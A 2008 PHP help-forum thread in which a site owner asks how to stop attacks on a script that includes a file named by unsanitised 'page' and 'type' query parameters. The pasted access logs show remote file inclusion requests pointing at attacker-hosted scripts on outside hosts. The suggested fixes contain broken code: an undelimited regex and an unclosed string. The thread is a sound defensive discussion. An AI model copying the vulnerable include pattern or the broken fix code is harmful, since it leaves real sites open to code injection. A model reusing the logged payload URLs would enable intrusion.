Jump to content

PHP Code security exploit (PHP injuction) How do I fix this?


Recommended Posts

Hi Everyone,

 

I've got the following code in in a PHP which opens up a .HTM

 

<?php

if (isset($_GET["page"])){

$thepage = $_GET["page"];

$thetype = $_GET["type"];

include $thepage.'.'.$thetype;

}

?>

 

The problem is, this code is being exploited (see below for example).

 

Does anyone know how to stop this? :(

 

189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"

189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

 

 

 

cheers,

Andrew

1. This has nothing to do with object oriented programming (OOP).

2. Code tags are your friends.

3. Your problem stems from not securing your incoming query strings.  At all.

 

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages).  Then you can compare the incoming value with your list of legit pages.

 

$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names
$page = strtolower($_GET['page']); //make sure the incoming value is all lowercase

if(!in_array($page, $allowedPages))
{
   echo "I don't think so....";
}
else
{
   include $page . '.' . $type;
}

1. This has nothing to do with object oriented programming (OOP).

2. Code tags are your friends.

3. Your problem stems from not securing your incoming query strings.  At all.

 

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages).  Then you can compare the incoming value with your list of legit pages.

 

$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names
$page = strtolower($_GET['page']); //make sure the incoming value is all lowercase

if(!in_array($page, $allowedPages))
{
   echo "I don't think so....";
}
else
{
   include $page . '.' . $type;
}

 

Hi Nightslyr, unfortuantely my site has quite few pages, any other ideas?

http://www.pacote270178.xpg.com.br/teste2.txt

 

 

lol.....  It looks like who ever exploited your site is using your server to mass email.  Depending on how many people he's spamming, you get get some fun messages soon ;p.

 

 

 

 

 

First off, don't let people pass in the extension.  There's no reason to.  I would use just PHP pages.

 

Second, restrict it some how.  A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:

 

 

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) {
    require 'some/folder/' . $page . '.php';
}
else {
    echo "Page not found!";
}

http://www.pacote270178.xpg.com.br/teste2.txt

 

 

lol.....  It looks like who ever exploited your site is using your server to mass email.  Depending on how many people he's spamming, you get get some fun messages soon ;p.

 

First off, don't let people pass in the extension.  There's no reason to.  I would use just PHP pages.

 

Second, restrict it some how.  A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:

 

 

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) {
    require 'some/folder/' . $page . '.php';
}
else {
    echo "Page not found!";
}

 

 

Hi Corbin,

 

thanks for your help.

 

Just a quick question, I have a .htaccess file which displays the following:

 

RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]

 

and I put the following code in:

 

 

<?php

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';

if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {

    require 'dvd/' . $page . '.php;

}

else {

    echo "Page not found!";

}

?

 

Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111

 

What am I missing?

 

 

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.